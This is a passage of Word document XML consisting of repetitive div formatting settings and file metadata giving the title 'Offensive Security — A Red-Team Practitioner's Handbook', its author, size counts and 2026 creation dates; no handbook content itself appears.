        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="866331296">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="216"/>
      <w:marBottom w:val="216"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="879703825">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="240"/>
      <w:marBottom w:val="240"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="906112941">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="907962511">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="216"/>
      <w:marBottom w:val="216"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="911888309">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="216"/>
      <w:marBottom w:val="216"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="960500409">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="719867657">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="599681019">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="972951207">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="977681933">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="216"/>
      <w:marBottom w:val="216"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1029835427">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1092122366">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="216"/>
      <w:marBottom w:val="216"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1120609665">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="216"/>
      <w:marBottom w:val="216"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1128937003">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1136413339">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="216"/>
      <w:marBottom w:val="216"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1182083839">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1197691261">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1197699541">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1710717192">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1202136655">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="240"/>
      <w:marBottom w:val="240"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1229615173">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1305506088">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="240"/>
      <w:marBottom w:val="240"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1332294059">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="216"/>
      <w:marBottom w:val="216"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1355644117">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="216"/>
      <w:marBottom w:val="216"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1377122074">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="896741491">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1394238299">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1398744672">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="240"/>
      <w:marBottom w:val="240"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1402480080">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1425342661">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="240"/>
      <w:marBottom w:val="240"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1431586775">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="751320758">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1548952508">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1559587884">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1578637806">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="216"/>
      <w:marBottom w:val="216"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1633251739">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="240"/>
      <w:marBottom w:val="240"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1668971523">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1723359615">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1821727496">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1844583565">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1876042888">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="216"/>
      <w:marBottom w:val="216"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1916165121">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="216"/>
      <w:marBottom w:val="216"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1961493374">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2026128980">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="204578711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38150</Words>
  <Characters>217457</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>4</DocSecurity>
  <Lines>1812</Lines>
  <Paragraphs>510</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>255097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Offensive Security — A Red-Team Practitioner's Handbook</dc:title>
  <dc:subject/>
  <dc:creator>Michael Mancuso</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Michael Mancuso</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-21T15:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-21T15:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>